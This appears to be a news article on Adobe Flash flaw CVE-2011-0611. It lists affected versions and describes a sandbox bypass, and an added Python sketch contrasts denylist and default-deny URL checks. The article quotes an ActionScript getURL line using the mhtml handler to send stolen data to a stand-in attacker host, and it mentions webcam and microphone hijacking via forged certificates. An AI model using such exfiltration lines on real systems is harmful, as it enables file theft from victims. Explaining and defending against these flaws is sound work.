July 17, 2019

Adobe Reveals Details of New Active Exploit in Flash Player

Adobe has revealed details of a critical vulnerability (CVE-2011-0611) in its Flash Player that is being actively exploited. This is another security blow for Adobe, coming shortly after it was revealed that hackers managed to breach security at RSA using a flaw in Flash. The current exploit, which targets Windows, uses a Flash (.swf) file embedded in a Microsoft Word (.doc) file delivered as an email attachment.

According to Adobe, the critical vulnerability exists in Flash Player 10.2.153.1 (10.2.154.25 for Chrome users) and earlier versions for Windows, Macintosh, Linux and Solaris. Adobe Flash Player 10.2.156.12 and earlier versions for Android are also affected.

Adobe is working on an update to Flash Player 10.2.x and earlier versions for Windows, Macintosh, Linux, Solaris and Android.

AFFECTED SOFTWARE VERSIONS

  • Adobe Flash Player 10.2.153.1 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems
  • Adobe Flash Player 10.2.154.25 and earlier for Chrome users
  • Adobe Flash Player 10.2.156.12 and earlier for Android
  • The Authplay.dll component that ships with Adobe Reader and Acrobat X (10.0.2) and earlier 10.x and 9.x versions for Windows and Macintosh operating systems

NOTE: Adobe Reader 9.x for UNIX, Adobe Reader for Android, and Adobe Reader and Acrobat 8.x are not affected by this issue.


Bypass Flash Player Sandbox

Adobe Flash applications that run locally can access local files and transfer them to an attacker's server.

Adobe has implemented a number of sandboxes to enhance the user’s security. However, the restrictions imposed by the sandboxes depend on the origin and access rights of the SWF file. Local SWF files run within the local-with-file-system sandbox and are permitted to access local files, but not the network.

However, security researcher Billy Rios has discovered that Adobe controls access to the network using a blacklist of protocols such as HTTP and HTTPS. Therefore, it is possible to send files to a server using the file: protocol handler. Nevertheless, this is only possible within the local area network.

Billy Rios has identified another protocol handler, mhtml, which can be used to send data to remote servers from the victim PC with the ActionScript command: getURL('mhtml:http://attacker-server.com/stolen-data-here', '');
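
The gap between the blacklist described above and a default-deny check, as an added Python sketch (not Adobe's code and not from the original article). It models the policy only as far as the article describes it; the function names and every sample URL other than the quoted mhtml one are assumptions.

```python
from urllib.parse import urlsplit

# Model of the flawed design: network schemes are enumerated and blocked,
# everything else is implicitly allowed. The two entries come from the article.
DENIED_SCHEMES = {"http", "https"}

def denylist_allows(url: str) -> bool:
    """Blacklist policy: permit any URL whose scheme is not explicitly denied."""
    return urlsplit(url.strip()).scheme not in DENIED_SCHEMES

def allowlist_allows(url: str) -> bool:
    """Default-deny policy for a local-only sandbox: only file: URLs that
    name no remote host are permitted; every other scheme is refused."""
    parts = urlsplit(url.strip())
    if parts.scheme != "file":
        return False
    # file://host/share resolves over the network (SMB/UNC), so a non-empty
    # authority other than localhost counts as network access.
    return parts.netloc in ("", "localhost")

# Constructed sample requests; the mhtml URL is the one quoted in the article,
# the others are hypothetical.
SAMPLES = [
    "http://attacker-server.com/x",
    "HTTPS://attacker-server.com/x",
    "file:///C:/Users/victim/notes.txt",
    "file://fileserver.lan/share/drop.txt",
    "mhtml:http://attacker-server.com/stolen-data-here",
]

def compare(urls):
    """Return (url, denylist verdict, allowlist verdict) for each URL."""
    return [(u, denylist_allows(u), allowlist_allows(u)) for u in urls]

if __name__ == "__main__":
    for url, deny, allow in compare(SAMPLES):
        print(f"{url:52} denylist={'allow' if deny else 'block':5} "
              f"allowlist={'allow' if allow else 'block'}")
```

The last two samples are the cases the article describes: both pass the blacklist because their schemes were never listed, while the default-deny check refuses them.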

Flash Player as a spy system

If a forged certificate is accepted when accessing the Flash Player’s Settings Manager, which is available exclusively online, attackers can potentially manipulate the player’s website privacy settings. This allows a web page to access a computer’s web cams and microphones and remotely turn the computer into a covert listening device or surveillance camera.


Source: [TheHSecurity]